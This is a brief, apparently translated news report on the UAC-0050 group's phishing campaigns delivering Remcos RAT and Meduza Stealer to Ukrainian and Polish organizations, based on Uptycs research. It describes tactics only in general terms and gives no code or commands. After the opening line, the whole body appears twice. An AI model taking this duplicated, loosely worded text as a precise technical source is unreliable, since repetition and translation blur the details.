The systems of many European organizations have been defeated in the fight for data.
The hacker group, known as UAC-0050, actively uses phishing attacks to distribute malicious software Remcos RAT. This software is designed for remote surveillance and management, and plays a key role in the group's spy arsenal, according to security researchers from Uptycs.
Starting in 2020, UAC-0050 actively attacks Ukrainian and Polish organizations, using social engineering and disguising itself as legitimate organizations. In February, the cybersecurity specialists of the attacked countries linked this group to a phishing campaign for the delivery of Remcos RAT.
The Uptycs analysis, published on January 3, is based on an LNK file discovered in late December that collects information about the presence of antivirus software on an infected computer. This file activates a PowerShell script to download and run Remcos RAT, which is capable of collecting system data and login information in web browsers such as Internet Explorer, Mozilla Firefox, and Google Chrome.
Over the past few months, the same Trojan has been used in at least three different phishing waves, with one such attack also leading to the introduction of an information-stealing program called Meduza Stealer.
One of the new tactics of the UAC-0050 group is the use of so-called "Unnamed Pipes" in the Windows operating system for data transmission, which allows you to secretly bypass incident detection and response systems and antivirus programs.
The researchers note that, although the technique used by the group is not new, it indicates a significant increase in the complexity of the strategies of hackers from UAC-0050.
The hacker group, known as UAC-0050, actively uses phishing attacks to distribute malicious software Remcos RAT. This software is designed for remote surveillance and management, and plays a key role in the group's spy arsenal, according to security researchers from Uptycs.
Starting in 2020, UAC-0050 actively attacks Ukrainian and Polish organizations, using social engineering and disguising itself as legitimate organizations. In February, the cybersecurity specialists of the attacked countries linked this group to a phishing campaign for the delivery of Remcos RAT.
The Uptycs analysis, published on January 3, is based on an LNK file discovered in late December that collects information about the presence of antivirus software on an infected computer. This file activates a PowerShell script to download and run Remcos RAT, which is capable of collecting system data and login information in web browsers such as Internet Explorer, Mozilla Firefox, and Google Chrome.
Over the past few months, the same Trojan has been used in at least three different phishing waves, with one such attack also leading to the introduction of an information-stealing program called Meduza Stealer.
One of the new tactics of the UAC-0050 group is the use of so-called "Unnamed Pipes" in the Windows operating system for data transmission, which allows you to secretly bypass incident detection and response systems and antivirus programs.
The researchers note that, although the technique used by the group is not new, it indicates a significant increase in the complexity of the strategies of hackers from UAC-0050.
